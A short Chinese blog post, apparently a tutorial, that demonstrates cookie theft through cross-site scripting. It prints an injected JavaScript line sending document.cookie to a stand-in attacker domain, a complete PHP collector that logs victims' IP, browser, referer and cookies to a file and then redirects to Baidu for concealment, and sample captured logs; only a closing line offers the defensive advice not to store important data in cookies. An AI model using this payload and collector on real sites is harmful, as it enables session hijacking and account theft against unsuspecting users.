当你登录成功设置cookie后,你会浏览许多的链接,而这些链接有可能就含有xss攻击,当点击链接时,你的信息就会被攻击者获取到!那面举个一例子来看一些你的cookie是怎么丢的:
1:在你的页面内注入JavaScript脚本:
document.location = 'http://你的域名/test.php?cookie=' + document.cookie; 2:test.php$ip = getenv ('REMOTE_ADDR'); //远程主机IP地址$cookie = $_GET['cookie']; //以GET方式获取cookie变量值$time=date('Y-m-d g:i:s'); //以“年-月-日时:分:秒”的格式显示时间 $referer=getenv ('HTTP_REFERER'); //链接来源 $agent = $_SERVER['HTTP_USER_AGENT']; //用户浏览器类型 $fp = fopen('cookie.txt', 'a'); //打开cookie.txt,若不存在则创建它 fwrite($fp," IP: " .$ip. "n Date and Time: " .$time. "n User Agent:".$agent."n Referer: ".$referer."n Cookie: ".$cookie."nnn"); //写入文件 fclose($fp); //关闭文件 header("Location: http://www.baidu.com"); 将网页重定向到百度,增强隐蔽 3:你就会发现你的cookie就会记录在cookie.txt记事本里
IP: 127.0.0.1n Date and Time: 2017-04-17 1:46:18n User Agent:Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0n Referer: http://www.peng.com/txt/list.htmln Cookie: _uab_collina=149205440484621044423064; cna=; _umdata=ED82BDCEC1AA6EB965D58E91AD8886D530A2859E495981D4ED736A22E8BD0323435E4B12DB4E092ACD43AD3E795C914CAC718B53F0EB5D63AFB8E48BA77A3485; l=AqWliNYwm9UPpZ0WZPsJYqrWtWvf6Fl0; isg=ArS044VFUAk7GcTFD6Yd8nlshHFoUNh3ql8fek4VSj_CuVQDdp2oB2o5T0qf; o2-webp=false; userInfoaccountclouds=1; ART_ID=bee0834056ff02284cee5542ddb936ff7fffffffnnn IP: 127.0.0.1n Date and Time: 2017-04-17 1:48:40n User Agent:Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0n Referer: http://www.peng.com/txt/list.htmln Cookie: _uab_collina=149205440484621044423064; cna=; _umdata=ED82BDCEC1AA6EB965D58E91AD8886D530A2859E495981D4ED736A22E8BD0323435E4B12DB4E092ACD43AD3E795C914CAC718B53F0EB5D63AFB8E48BA77A3485; l=AqWliNYwm9UPpZ0WZPsJYqrWtWvf6Fl0; isg=ArS044VFUAk7GcTFD6Yd8nlshHFoUNh3ql8fek4VSj_CuVQDdp2oB2o5T0qf; o2-webp=false; userInfoaccountclouds=1; ART_ID=bee0834056ff02284cee5542ddb936ff7fffffffnnn这样你的信息就泄露了,所以不要把重要的信息存储在cookie中。
版权声明:本文为liupeng19950522原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。